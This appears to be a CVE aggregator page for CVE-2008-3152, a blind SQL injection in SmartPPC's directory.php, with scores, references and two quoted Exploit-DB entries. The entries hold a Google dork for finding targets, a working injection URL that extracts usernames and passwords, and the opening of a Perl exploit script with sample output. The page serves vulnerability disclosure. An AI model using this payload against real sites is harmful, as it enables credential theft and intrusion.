CVE-2008-3152
published 2008-07-11CVE-2008-3152: SQL injection vulnerability in directory.php in SmartPPC and SmartPPC Pro allows remote attackers to execute arbitrary SQL commands via the idDirectory…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.05%
60.0th percentile
SQL injection vulnerability in directory.php in SmartPPC and SmartPPC Pro allows remote attackers to execute arbitrary SQL commands via the idDirectory parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (1)
exploitdb·2008-07-07
CVE-2008-3152 SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (1)
SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (1)
---
+---------------------------------------+
| Blind SQL Injection Vulnerability |
| in Pay Per Click Script |
| found by Hamtaro aka CorVu5 |
|there must be 50 ways to learn to hover|
+---------------------------------------+
#gdork: "Pay Per Click Script powered by SmartPPC.com."
#vuln: site.com/directory.php?username=&idDirectory=90992%20and%20ascii(substring((SELECT%20concat(username,0x3a,pass)%20from%20users%20limit%200,1),1,1))%3E108
#login: site.com/accounts.php
greetz Hamtaro aka CorVu5
# milw0rm.com [2008-07-07]
Exploit-DB
SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (2)
exploitdb·2008-07-07
CVE-2008-3152 SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (2)
SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (2)
---
#!/usr/bin/perl -W
# SmartPPC Pay Per Click Script Blind SQL Injection Exploit
# File affected: directory.php ($idDirectory)
#
# Vulnerability: Hamtaro
# Exploit: ka0x
#
#
# ka0x@domlabs:~$ ./smartppc.pl -u "http://localhost/directory.php?username=&idDirectory=2" -p Top
# [i] Getting default: -T 30
# [i] Getting default: -l 200
# [i] Getting default: -t 15
# 18 118 v
# [!] $EXIT_IF_NO_CHAR : I can't find a valid character, position 18.
# [i] USER / PASSWORD:
# ka0x / test12345_
#
# special thanks: NullWave07, an0de, Piker, Xarnuz
my $MAX_FIELD_LENGTH = 200 ;
my $EXIT_IF_NO_CHAR = 1 ;
my $DEFAULT_THREADS = 15 ;
my $DEFAULT_THREADS_TIMEOUT = 30 ;
my @ascii = ( 32 .. 123 ) ;
my $DEFAULT_THREADS_TIME = 1 ;
use LW
No writeups or analysis indexed.
http://www.securityfocus.com/bid/30111http://www.vupen.com/english/advisories/2008/2013/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/43597https://www.exploit-db.com/exploits/6014https://www.exploit-db.com/exploits/6019http://www.securityfocus.com/bid/30111http://www.vupen.com/english/advisories/2008/2013/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/43597https://www.exploit-db.com/exploits/6014https://www.exploit-db.com/exploits/6019
2008-07-11
Published